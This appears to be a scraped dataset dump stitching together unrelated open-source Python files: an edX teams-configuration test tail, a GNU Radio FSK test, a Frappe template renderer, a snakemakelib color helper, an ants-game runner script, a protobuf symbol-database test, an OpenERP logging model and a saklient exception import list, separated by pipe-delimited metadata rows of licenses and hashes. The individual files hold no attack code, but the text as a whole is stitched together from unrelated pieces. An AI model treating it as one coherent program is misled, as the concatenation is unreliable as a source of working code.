class DiscussionTopicsTestCase(unittest.TestCase):
def test_default_discussion_topics(self):
d = get_dummy_course('2012-12-02T12:00')
self.assertEqual({'General': {'id': 'i4x-test_org-test_course-course-test'}}, d.discussion_topics)
class TeamsConfigurationTestCase(unittest.TestCase):
"""
Tests for the configuration of teams and the helper methods for accessing them.
"""
def setUp(self):
super(TeamsConfigurationTestCase, self).setUp()
self.course = get_dummy_course('2012-12-02T12:00')
self.course.teams_configuration = dict()
self.count = itertools.count()
def add_team_configuration(self, max_team_size=3, topics=None):
""" Add a team configuration to the course. """
teams_configuration = {}
teams_configuration["topics"] = [] if topics is None else topics
if max_team_size is not None:
teams_configuration["max_team_size"] = max_team_size
self.course.teams_configuration = teams_configuration
def make_topic(self):
""" Make a sample topic dictionary. """
next_num = self.count.next()
topic_id = "topic_id_{}".format(next_num)
display_name = "Display Name {}".format(next_num)
description = "Description {}".format(next_num)
return {"display_name": display_name, "description": description, "id": topic_id}
def test_teams_enabled_new_course(self):
# Make sure we can detect when no teams exist.
self.assertFalse(self.course.teams_enabled)
# add topics
self.add_team_configuration(max_team_size=4, topics=[self.make_topic()])
self.assertTrue(self.course.teams_enabled)
# remove them again
self.add_team_configuration(max_team_size=4, topics=[])
self.assertFalse(self.course.teams_enabled)
def test_teams_enabled_max_size_only(self):
self.add_team_configuration(max_team_size=4)
self.assertFalse(self.course.teams_enabled)
def test_teams_enabled_no_max_size(self):
self.add_team_configuration(max_team_size=None, topics=[self.make_topic()])
self.assertTrue(self.course.teams_enabled)
def test_teams_max_size_no_teams_configuration(self):
self.assertIsNone(self.course.teams_max_size)
def test_teams_max_size_with_teams_configured(self):
size = 4
self.add_team_configuration(max_team_size=size, topics=[self.make_topic(), self.make_topic()])
self.assertTrue(self.course.teams_enabled)
self.assertEqual(size, self.course.teams_max_size)
def test_teams_topics_no_teams(self):
self.assertIsNone(self.course.teams_topics)
def test_teams_topics_no_topics(self):
self.add_team_configuration(max_team_size=4)
self.assertEqual(self.course.teams_topics, [])
def test_teams_topics_with_topics(self):
topics = [self.make_topic(), self.make_topic()]
self.add_team_configuration(max_team_size=4, topics=topics)
self.assertTrue(self.course.teams_enabled)
self.assertEqual(self.course.teams_topics, topics)
| agpl-3.0 | 1,105,887,058,775,413,200 | 42.797143 | 124 | 0.637093 | false |
gnychis/gnuradio-3.5.0-dmr | gnuradio-core/src/python/gnuradio/gr/qa_fsk_stuff.py | 11 | 2664 | #!/usr/bin/env python
#
# Copyright 2004,2007,2010 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest
import math
def sincos(x):
return math.cos(x) + math.sin(x) * 1j
class test_bytes_to_syms (gr_unittest.TestCase):
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def test_bytes_to_syms_001 (self):
src_data = (0x01, 0x80, 0x03)
expected_result = (-1, -1, -1, -1, -1, -1, -1, +1,
+1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, +1, +1)
src = gr.vector_source_b (src_data)
op = gr.bytes_to_syms ()
dst = gr.vector_sink_f ()
self.tb.connect (src, op)
self.tb.connect (op, dst)
self.tb.run ()
result_data = dst.data ()
self.assertEqual (expected_result, result_data)
def test_simple_framer (self):
src_data = (0x00, 0x11, 0x22, 0x33,
0x44, 0x55, 0x66, 0x77,
0x88, 0x99, 0xaa, 0xbb,
0xcc, 0xdd, 0xee, 0xff)
expected_result = (
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x00, 0x00, 0x11, 0x22, 0x33, 0x55,
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x01, 0x44, 0x55, 0x66, 0x77, 0x55,
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x02, 0x88, 0x99, 0xaa, 0xbb, 0x55,
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x03, 0xcc, 0xdd, 0xee, 0xff, 0x55)
src = gr.vector_source_b (src_data)
op = gr.simple_framer (4)
dst = gr.vector_sink_b ()
self.tb.connect (src, op)
self.tb.connect (op, dst)
self.tb.run ()
result_data = dst.data ()
self.assertEqual (expected_result, result_data)
if __name__ == '__main__':
gr_unittest.run(test_bytes_to_syms, "test_bytes_to_syms.xml")
| gpl-3.0 | 5,042,378,309,125,066,000 | 34.52 | 95 | 0.587462 | false |
pawaranand/phr-frappe | frappe/website/template.py | 16 | 2988 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import strip_html
from frappe.website.utils import scrub_relative_urls
from jinja2.utils import concat
from jinja2 import meta
import re
def render_blocks(context):
"""returns a dict of block name and its rendered content"""
out = {}
env = frappe.get_jenv()
def _render_blocks(template_path):
source = frappe.local.jloader.get_source(frappe.local.jenv, template_path)[0]
for referenced_template_path in meta.find_referenced_templates(env.parse(source)):
if referenced_template_path:
_render_blocks(referenced_template_path)
template = frappe.get_template(template_path)
for block, render in template.blocks.items():
out[block] = scrub_relative_urls(concat(render(template.new_context(context))))
_render_blocks(context["template"])
# default blocks if not found
if "title" not in out and out.get("header"):
out["title"] = out["header"]
if "title" not in out:
out["title"] = context.get("title")
if "header" not in out and out.get("title"):
out["header"] = out["title"]
if out.get("header") and not out["header"].startswith("<h"):
out["header"] = "<h2>" + out["header"] + "</h2>"
if "breadcrumbs" not in out:
if context.doc and hasattr(context.doc, "get_parents"):
context.parents = context.doc.get_parents(context)
out["breadcrumbs"] = scrub_relative_urls(
frappe.get_template("templates/includes/breadcrumbs.html").render(context))
if "meta_block" not in out:
out["meta_block"] = frappe.get_template("templates/includes/meta_block.html").render(context)
out["no_sidebar"] = context.get("no_sidebar", 0)
if "<!-- no-sidebar -->" in out.get("content", ""):
out["no_sidebar"] = 1
if "<!-- title:" in out.get("content", ""):
out["title"] = re.findall('<!-- title:([^>]*) -->', out.get("content"))[0].strip()
if "{index}" in out.get("content", "") and context.get("children"):
html = frappe.get_template("templates/includes/static_index.html").render({
"items": context["children"]})
out["content"] = out["content"].replace("{index}", html)
if "{next}" in out.get("content", ""):
next_item = context.doc.get_next()
if next_item:
if next_item.name[0]!="/": next_item.name = "/" + next_item.name
html = '''<p><br><a href="{name}" class="btn btn-primary">
{title} <i class="icon-chevron-right"></i></a>
</p>'''.format(**next_item)
out["content"] = out["content"].replace("{next}", html)
if "sidebar" not in out and not out.get("no_sidebar"):
out["sidebar"] = scrub_relative_urls(
frappe.get_template("templates/includes/sidebar.html").render(context))
out["title"] = strip_html(out.get("title") or "")
# remove style and script tags from blocks
out["style"] = re.sub("</?style[^<>]*>", "", out.get("style") or "")
out["script"] = re.sub("</?script[^<>]*>", "", out.get("script") or "")
return out
| mit | -8,699,666,599,041,346,000 | 32.954545 | 95 | 0.661647 | false |
percyfal/snakemakelib-core | snakemakelib/plot/bokeh/color.py | 1 | 1126 | # Copyright (C) 2015 by Per Unneberg
import math
import pandas.core.common as com
from bokeh.palettes import brewer as bokeh_brewer
from .palettes import brewer as snakemakelib_brewer
import logging
logger = logging.getLogger(__name__)
MINSIZE = 3
MAXSIZE = 9 # FIXME: some palettes have 9 as max, some 11
brewer = bokeh_brewer
brewer.update(snakemakelib_brewer)
def colorbrewer(size=MINSIZE, palette="Paired", datalen=None):
"""Generate a color palette following colorbrewer.
Args:
size (int): size of desired palette
palette (str): name of palette
datalen (int): length of data vector. If None, the palette size
will equal size, else the colors will be reused to fill
up a vector of length datalen
Returns:
palette (list): list of colors
"""
size = max(MINSIZE, min(size, MAXSIZE))
if datalen <= MAXSIZE and datalen >= MINSIZE:
size = datalen
colors = brewer[palette][size]
if datalen > size:
colors = colors * math.ceil(datalen / size)
return colors[0:datalen]
else:
return colors
| mit | -7,536,610,641,493,095,000 | 28.631579 | 76 | 0.666075 | false |
jacinda/ant | playgame.py | 1 | 20674 | #!/usr/bin/env python
from __future__ import print_function
import traceback
import sys
import os
import time
from optparse import OptionParser, OptionGroup
import random
import cProfile
import visualizer.visualize_locally
import json
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from ants import Ants
sys.path.append("../worker")
try:
from engine import run_game
except ImportError:
# this can happen if we're launched with cwd outside our own dir
# get our full path, then work relative from that
cmd_folder = os.path.dirname(os.path.abspath(__file__))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
sys.path.append(cmd_folder + "/../worker")
# try again
from engine import run_game
# make stderr red text
try:
import colorama
colorama.init()
colorize = True
color_default = (colorama.Fore.RED)
color_reset = (colorama.Style.RESET_ALL)
except:
colorize = False
color_default = None
color_reset = None
class Colorize(object):
def __init__(self, file, color=color_default):
self.file = file
self.color = color
self.reset = color_reset
def write(self, data):
if self.color:
self.file.write(''.join(self.color))
self.file.write(data)
if self.reset:
self.file.write(''.join(self.reset))
def flush(self):
self.file.flush()
def close(self):
self.file.close()
if colorize:
stderr = Colorize(sys.stderr)
else:
stderr = sys.stderr
class Comment(object):
def __init__(self, file):
self.file = file
self.last_char = '\n'
def write(self, data):
for char in data:
if self.last_char == '\n':
self.file.write('# ')
self.file.write(char)
self.last_char = char
def flush(self):
self.file.flush()
def close(self):
self.file.close()
class Tee(object):
''' Write to multiple files at once '''
def __init__(self, *files):
self.files = files
def write(self, data):
for file in self.files:
file.write(data)
def flush(self):
for file in self.files:
file.flush()
def close(self):
for file in self.files:
file.close()
def main(argv):
usage ="Usage: %prog [options] map bot1 bot2\n\nYou must specify a map file."
parser = OptionParser(usage=usage)
# map to be played
# number of players is determined by the map file
parser.add_option("-m", "--map_file", dest="map",
help="Name of the map file")
# maximum number of turns that the game will be played
parser.add_option("-t", "--turns", dest="turns",
default=1000, type="int",
help="Number of turns in the game")
parser.add_option("--serial", dest="serial",
action="store_true",
help="Run bots in serial, instead of parallel.")
parser.add_option("--turntime", dest="turntime",
default=1000, type="int",
help="Amount of time to give each bot, in milliseconds")
parser.add_option("--loadtime", dest="loadtime",
default=3000, type="int",
help="Amount of time to give for load, in milliseconds")
parser.add_option("-r", "--rounds", dest="rounds",
default=1, type="int",
help="Number of rounds to play")
parser.add_option("--player_seed", dest="player_seed",
default=None, type="int",
help="Player seed for the random number generator")
parser.add_option("--engine_seed", dest="engine_seed",
default=None, type="int",
help="Engine seed for the random number generator")
parser.add_option('--strict', dest='strict',
action='store_true', default=False,
help='Strict mode enforces valid moves for bots')
parser.add_option('--capture_errors', dest='capture_errors',
action='store_true', default=False,
help='Capture errors and stderr in game result')
parser.add_option('--end_wait', dest='end_wait',
default=0, type="float",
help='Seconds to wait at end for bots to process end')
parser.add_option('--secure_jail', dest='secure_jail',
action='store_true', default=False,
help='Use the secure jail for each bot (*nix only)')
parser.add_option('--fill', dest='fill',
action='store_true', default=False,
help='Fill up extra player starts with last bot specified')
parser.add_option('-p', '--position', dest='position',
default=0, type='int',
help='Player position for first bot specified')
# ants specific game options
game_group = OptionGroup(parser, "Game Options", "Options that affect the game mechanics for ants")
game_group.add_option("--attack", dest="attack",
default="focus",
help="Attack method to use for engine. (closest, focus, support, damage)")
game_group.add_option("--kill_points", dest="kill_points",
default=2, type="int",
help="Points awarded for killing a hill")
game_group.add_option("--food", dest="food",
default="symmetric",
help="Food spawning method. (none, random, sections, symmetric)")
game_group.add_option("--viewradius2", dest="viewradius2",
default=77, type="int",
help="Vision radius of ants squared")
game_group.add_option("--spawnradius2", dest="spawnradius2",
default=1, type="int",
help="Spawn radius of ants squared")
game_group.add_option("--attackradius2", dest="attackradius2",
default=5, type="int",
help="Attack radius of ants squared")
game_group.add_option("--food_rate", dest="food_rate", nargs=2, type="int", default=(5,11),
help="Numerator of food per turn per player rate")
game_group.add_option("--food_turn", dest="food_turn", nargs=2, type="int", default=(19,37),
help="Denominator of food per turn per player rate")
game_group.add_option("--food_start", dest="food_start", nargs=2, type="int", default=(75,175),
help="One over percentage of land area filled with food at start")
game_group.add_option("--food_visible", dest="food_visible", nargs=2, type="int", default=(3,5),
help="Amount of food guaranteed to be visible to starting ants")
game_group.add_option("--carry_food", dest="carry_food", type="int", default=100,
help="Amount of food that ants can carry. If carry_food==0, food is teleported to hill (original game behaviour)")
game_group.add_option("--cutoff_turn", dest="cutoff_turn", type="int", default=150,
help="Number of turns cutoff percentage is maintained to end game early")
game_group.add_option("--cutoff_percent", dest="cutoff_percent", type="float", default=0.85,
help="Number of turns cutoff percentage is maintained to end game early")
game_group.add_option("--scenario", dest="scenario",
action='store_true', default=False)
parser.add_option_group(game_group)
# the log directory must be specified for any logging to occur, except:
# bot errors to stderr
# verbose levels 1 & 2 to stdout and stderr
# profiling to stderr
# the log directory will contain
# the replay or stream file used by the visualizer, if requested
# the bot input/output/error logs, if requested
log_group = OptionGroup(parser, "Logging Options", "Options that control the logging")
log_group.add_option("-g", "--game", dest="game_id", default=0, type='int',
help="game id to start at when numbering log files")
log_group.add_option("-l", "--log_dir", dest="log_dir", default=None,
help="Directory to dump replay files to.")
log_group.add_option('-R', '--log_replay', dest='log_replay',
action='store_true', default=False),
log_group.add_option('-S', '--log_stream', dest='log_stream',
action='store_true', default=False),
log_group.add_option("-I", "--log_input", dest="log_input",
action="store_true", default=False,
help="Log input streams sent to bots")
log_group.add_option("-O", "--log_output", dest="log_output",
action="store_true", default=False,
help="Log output streams from bots")
log_group.add_option("-E", "--log_error", dest="log_error",
action="store_true", default=False,
help="log error streams from bots")
log_group.add_option('-e', '--log_stderr', dest='log_stderr',
action='store_true', default=False,
help='additionally log bot errors to stderr')
log_group.add_option('-o', '--log_stdout', dest='log_stdout',
action='store_true', default=False,
help='additionally log replay/stream to stdout')
# verbose will not print bot input/output/errors
# only info+debug will print bot error output
log_group.add_option("-v", "--verbose", dest="verbose",
action='store_true', default=False,
help="Print out status as game goes.")
log_group.add_option("--profile", dest="profile",
action="store_true", default=False,
help="Run under the python profiler")
parser.add_option("--nolaunch", dest="nolaunch",
action='store_true', default=False,
help="Prevent visualizer from launching")
log_group.add_option("--html", dest="html_file",
default=None,
help="Output file name for an html replay")
parser.add_option_group(log_group)
(opts, args) = parser.parse_args(argv)
if opts.map is None or not os.path.exists(opts.map):
parser.print_help()
return -1
try:
if opts.profile:
# put profile file into output dir if we can
prof_file = "ants.profile"
if opts.log_dir:
prof_file = os.path.join(opts.log_dir, prof_file)
# cProfile needs to be explitly told about out local and global context
print("Running profile and outputting to {0}".format(prof_file,), file=stderr)
cProfile.runctx("run_rounds(opts,args)", globals(), locals(), prof_file)
else:
# only use psyco if we are not profiling
# (psyco messes with profiling)
try:
import psyco
psyco.full()
except ImportError:
pass
run_rounds(opts,args)
return 0
except Exception:
traceback.print_exc()
return -1
def run_rounds(opts,args):
def get_cmd_wd(cmd, exec_rel_cwd=False):
''' get the proper working directory from a command line '''
new_cmd = []
wd = None
for i, part in reversed(list(enumerate(cmd.split()))):
if wd == None and os.path.exists(part):
wd = os.path.dirname(os.path.realpath(part))
basename = os.path.basename(part)
if i == 0:
if exec_rel_cwd:
new_cmd.insert(0, os.path.join(".", basename))
else:
new_cmd.insert(0, part)
else:
new_cmd.insert(0, basename)
else:
new_cmd.insert(0, part)
return wd, ' '.join(new_cmd)
def get_cmd_name(cmd):
''' get the name of a bot from the command line '''
for i, part in enumerate(reversed(cmd.split())):
if os.path.exists(part):
return os.path.basename(part)
# this split of options is not needed, but left for documentation
game_options = {
"map": opts.map,
"attack": opts.attack,
"kill_points": opts.kill_points,
"food": opts.food,
"viewradius2": opts.viewradius2,
"attackradius2": opts.attackradius2,
"spawnradius2": opts.spawnradius2,
"loadtime": opts.loadtime,
"turntime": opts.turntime,
"turns": opts.turns,
"food_rate": opts.food_rate,
"food_turn": opts.food_turn,
"food_start": opts.food_start,
"food_visible": opts.food_visible,
"carry_food": opts.carry_food,
"cutoff_turn": opts.cutoff_turn,
"cutoff_percent": opts.cutoff_percent,
"scenario": opts.scenario }
if opts.player_seed != None:
game_options['player_seed'] = opts.player_seed
if opts.engine_seed != None:
game_options['engine_seed'] = opts.engine_seed
engine_options = {
"loadtime": opts.loadtime,
"turntime": opts.turntime,
"map_file": opts.map,
"turns": opts.turns,
"log_replay": opts.log_replay,
"log_stream": opts.log_stream,
"log_input": opts.log_input,
"log_output": opts.log_output,
"log_error": opts.log_error,
"serial": opts.serial,
"strict": opts.strict,
"capture_errors": opts.capture_errors,
"secure_jail": opts.secure_jail,
"end_wait": opts.end_wait }
for round in range(opts.rounds):
# initialize game
game_id = round + opts.game_id
with open(opts.map, 'r') as map_file:
game_options['map'] = map_file.read()
if opts.engine_seed:
game_options['engine_seed'] = opts.engine_seed + round
game = Ants(game_options)
# initialize bots
bots = [get_cmd_wd(arg, exec_rel_cwd=opts.secure_jail) for arg in args]
bot_count = len(bots)
# insure correct number of bots, or fill in remaining positions
if game.num_players != len(bots):
if game.num_players > len(bots) and opts.fill:
extra = game.num_players - len(bots)
for _ in range(extra):
bots.append(bots[-1])
else:
print("Incorrect number of bots for map. Need {0}, got {1}"
.format(game.num_players, len(bots)), file=stderr)
for arg in args:
print("Bot Cmd: {0}".format(arg), file=stderr)
break
bot_count = len(bots)
# move position of first bot specified
if opts.position > 0 and opts.position <= len(bots):
first_bot = bots[0]
bots = bots[1:]
bots.insert(opts.position, first_bot)
# initialize file descriptors
if opts.log_dir and not os.path.exists(opts.log_dir):
os.mkdir(opts.log_dir)
if not opts.log_replay and not opts.log_stream and (opts.log_dir or opts.log_stdout):
opts.log_replay = True
replay_path = None # used for visualizer launch
if opts.log_replay:
if opts.log_dir:
replay_path = os.path.join(opts.log_dir, '{0}.replay'.format(game_id))
engine_options['replay_log'] = open(replay_path, 'w')
if opts.log_stdout:
if 'replay_log' in engine_options and engine_options['replay_log']:
engine_options['replay_log'] = Tee(sys.stdout, engine_options['replay_log'])
else:
engine_options['replay_log'] = sys.stdout
else:
engine_options['replay_log'] = None
if opts.log_stream:
if opts.log_dir:
engine_options['stream_log'] = open(os.path.join(opts.log_dir, '{0}.stream'.format(game_id)), 'w')
if opts.log_stdout:
if engine_options['stream_log']:
engine_options['stream_log'] = Tee(sys.stdout, engine_options['stream_log'])
else:
engine_options['stream_log'] = sys.stdout
else:
engine_options['stream_log'] = None
if opts.log_input and opts.log_dir:
engine_options['input_logs'] = [open(os.path.join(opts.log_dir, '{0}.bot{1}.input'.format(game_id, i)), 'w')
for i in range(bot_count)]
else:
engine_options['input_logs'] = None
if opts.log_output and opts.log_dir:
engine_options['output_logs'] = [open(os.path.join(opts.log_dir, '{0}.bot{1}.output'.format(game_id, i)), 'w')
for i in range(bot_count)]
else:
engine_options['output_logs'] = None
if opts.log_error and opts.log_dir:
if opts.log_stderr:
if opts.log_stdout:
engine_options['error_logs'] = [Tee(Comment(stderr), open(os.path.join(opts.log_dir, '{0}.bot{1}.error'.format(game_id, i)), 'w'))
for i in range(bot_count)]
else:
engine_options['error_logs'] = [Tee(stderr, open(os.path.join(opts.log_dir, '{0}.bot{1}.error'.format(game_id, i)), 'w'))
for i in range(bot_count)]
else:
engine_options['error_logs'] = [open(os.path.join(opts.log_dir, '{0}.bot{1}.error'.format(game_id, i)), 'w')
for i in range(bot_count)]
elif opts.log_stderr:
if opts.log_stdout:
engine_options['error_logs'] = [Comment(stderr)] * bot_count
else:
engine_options['error_logs'] = [stderr] * bot_count
else:
engine_options['error_logs'] = None
if opts.verbose:
if opts.log_stdout:
engine_options['verbose_log'] = Comment(sys.stdout)
else:
engine_options['verbose_log'] = sys.stdout
engine_options['game_id'] = game_id
if opts.rounds > 1:
print('# playgame round {0}, game id {1}'.format(round, game_id))
# intercept replay log so we can add player names
if opts.log_replay:
intcpt_replay_io = StringIO()
real_replay_io = engine_options['replay_log']
engine_options['replay_log'] = intcpt_replay_io
result = run_game(game, bots, engine_options)
# add player names, write to proper io, reset back to normal
if opts.log_replay:
replay_json = json.loads(intcpt_replay_io.getvalue())
replay_json['playernames'] = [get_cmd_name(arg) for arg in args]
real_replay_io.write(json.dumps(replay_json))
intcpt_replay_io.close()
engine_options['replay_log'] = real_replay_io
# close file descriptors
if engine_options['stream_log']:
engine_options['stream_log'].close()
if engine_options['replay_log']:
engine_options['replay_log'].close()
if engine_options['input_logs']:
for input_log in engine_options['input_logs']:
input_log.close()
if engine_options['output_logs']:
for output_log in engine_options['output_logs']:
output_log.close()
if engine_options['error_logs']:
for error_log in engine_options['error_logs']:
error_log.close()
if replay_path:
if opts.nolaunch:
if opts.html_file:
visualizer.visualize_locally.launch(replay_path, True, opts.html_file)
else:
if opts.html_file == None:
visualizer.visualize_locally.launch(replay_path,
generated_path="replay.{0}.html".format(game_id))
else:
visualizer.visualize_locally.launch(replay_path,
generated_path=opts.html_file)
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
| gpl-2.0 | 5,618,681,464,800,026,000 | 43.652268 | 150 | 0.549918 | false |
jjas0nn/solvem | tensorflow/lib/python2.7/site-packages/google/protobuf/internal/symbol_database_test.py | 43 | 5386 | #! /usr/bin/env python
#
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for google.protobuf.symbol_database."""
try:
import unittest2 as unittest #PY26
except ImportError:
import unittest
from google.protobuf import unittest_pb2
from google.protobuf import descriptor
from google.protobuf import descriptor_pool
from google.protobuf import symbol_database
class SymbolDatabaseTest(unittest.TestCase):
def _Database(self):
if descriptor._USE_C_DESCRIPTORS:
# The C++ implementation does not allow mixing descriptors from
# different pools.
db = symbol_database.SymbolDatabase(pool=descriptor_pool.Default())
else:
db = symbol_database.SymbolDatabase()
# Register representative types from unittest_pb2.
db.RegisterFileDescriptor(unittest_pb2.DESCRIPTOR)
db.RegisterMessage(unittest_pb2.TestAllTypes)
db.RegisterMessage(unittest_pb2.TestAllTypes.NestedMessage)
db.RegisterMessage(unittest_pb2.TestAllTypes.OptionalGroup)
db.RegisterMessage(unittest_pb2.TestAllTypes.RepeatedGroup)
db.RegisterEnumDescriptor(unittest_pb2.ForeignEnum.DESCRIPTOR)
db.RegisterEnumDescriptor(unittest_pb2.TestAllTypes.NestedEnum.DESCRIPTOR)
return db
def testGetPrototype(self):
instance = self._Database().GetPrototype(
unittest_pb2.TestAllTypes.DESCRIPTOR)
self.assertTrue(instance is unittest_pb2.TestAllTypes)
def testGetMessages(self):
messages = self._Database().GetMessages(
['google/protobuf/unittest.proto'])
self.assertTrue(
unittest_pb2.TestAllTypes is
messages['protobuf_unittest.TestAllTypes'])
def testGetSymbol(self):
self.assertEqual(
unittest_pb2.TestAllTypes, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes'))
self.assertEqual(
unittest_pb2.TestAllTypes.NestedMessage, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes.NestedMessage'))
self.assertEqual(
unittest_pb2.TestAllTypes.OptionalGroup, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes.OptionalGroup'))
self.assertEqual(
unittest_pb2.TestAllTypes.RepeatedGroup, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes.RepeatedGroup'))
def testEnums(self):
# Check registration of types in the pool.
self.assertEqual(
'protobuf_unittest.ForeignEnum',
self._Database().pool.FindEnumTypeByName(
'protobuf_unittest.ForeignEnum').full_name)
self.assertEqual(
'protobuf_unittest.TestAllTypes.NestedEnum',
self._Database().pool.FindEnumTypeByName(
'protobuf_unittest.TestAllTypes.NestedEnum').full_name)
def testFindMessageTypeByName(self):
self.assertEqual(
'protobuf_unittest.TestAllTypes',
self._Database().pool.FindMessageTypeByName(
'protobuf_unittest.TestAllTypes').full_name)
self.assertEqual(
'protobuf_unittest.TestAllTypes.NestedMessage',
self._Database().pool.FindMessageTypeByName(
'protobuf_unittest.TestAllTypes.NestedMessage').full_name)
def testFindFindContainingSymbol(self):
# Lookup based on either enum or message.
self.assertEqual(
'google/protobuf/unittest.proto',
self._Database().pool.FindFileContainingSymbol(
'protobuf_unittest.TestAllTypes.NestedEnum').name)
self.assertEqual(
'google/protobuf/unittest.proto',
self._Database().pool.FindFileContainingSymbol(
'protobuf_unittest.TestAllTypes').name)
def testFindFileByName(self):
self.assertEqual(
'google/protobuf/unittest.proto',
self._Database().pool.FindFileByName(
'google/protobuf/unittest.proto').name)
if __name__ == '__main__':
unittest.main()
| mit | 4,791,155,438,559,791,000 | 40.114504 | 78 | 0.735797 | false |
Nowheresly/odoo | openerp/addons/base/ir/ir_logging.py | 326 | 1882 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014 OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp.osv import osv, fields
from openerp.tools.translate import _
class ir_logging(osv.Model):
_name = 'ir.logging'
_order = 'id DESC'
EXCEPTIONS_TYPE = [
('client', 'Client'),
('server', 'Server')
]
_columns = {
'create_date': fields.datetime('Create Date', readonly=True),
'create_uid': fields.integer('Uid', readonly=True), # Integer not m2o is intentionnal
'name': fields.char('Name', required=True),
'type': fields.selection(EXCEPTIONS_TYPE, string='Type', required=True, select=True),
'dbname': fields.char('Database Name', select=True),
'level': fields.char('Level', select=True),
'message': fields.text('Message', required=True),
'path': fields.char('Path', required=True),
'func': fields.char('Function', required=True),
'line': fields.char('Line', required=True),
}
| agpl-3.0 | 4,807,216,048,465,163,000 | 39.913043 | 94 | 0.608927 | false |
sakura-internet/saklient.python | saklient/errors/exceptionfactory.py | 1 | 32200 | # -*- coding:utf-8 -*-
# This code is automatically transpiled by Saklient Translator
import six
from .httpexception import HttpException
from .httpbadgatewayexception import HttpBadGatewayException
from .httpbadrequestexception import HttpBadRequestException
from .httpconflictexception import HttpConflictException
from .httpexpectationfailedexception import HttpExpectationFailedException
from .httpfaileddependencyexception import HttpFailedDependencyException
from .httpforbiddenexception import HttpForbiddenException
from .httpgatewaytimeoutexception import HttpGatewayTimeoutException
from .httpgoneexception import HttpGoneException
from .httphttpversionnotsupportedexception import HttpHttpVersionNotSupportedException
from .httpinsufficientstorageexception import HttpInsufficientStorageException
from .httpinternalservererrorexception import HttpInternalServerErrorException
from .httplengthrequiredexception import HttpLengthRequiredException
from .httplockedexception import HttpLockedException
from .httpmethodnotallowedexception import HttpMethodNotAllowedException
from .httpnotacceptableexception import HttpNotAcceptableException
from .httpnotextendedexception import HttpNotExtendedException
from .httpnotfoundexception import HttpNotFoundException
from .httpnotimplementedexception import HttpNotImplementedException
from .httppaymentrequiredexception import HttpPaymentRequiredException
from .httppreconditionfailedexception import HttpPreconditionFailedException
from .httpproxyauthenticationrequiredexception import HttpProxyAuthenticationRequiredException
from .httprequestentitytoolargeexception import HttpRequestEntityTooLargeException
from .httprequesttimeoutexception import HttpRequestTimeoutException
from .httprequesturitoolongexception import HttpRequestUriTooLongException
from .httprequestedrangenotsatisfiableexception import HttpRequestedRangeNotSatisfiableException
from .httpserviceunavailableexception import HttpServiceUnavailableException
from .httpunauthorizedexception import HttpUnauthorizedException
from .httpunprocessableentityexception import HttpUnprocessableEntityException
from .httpunsupportedmediatypeexception import HttpUnsupportedMediaTypeException
from .httpupgraderequiredexception import HttpUpgradeRequiredException
from .httpvariantalsonegotiatesexception import HttpVariantAlsoNegotiatesException
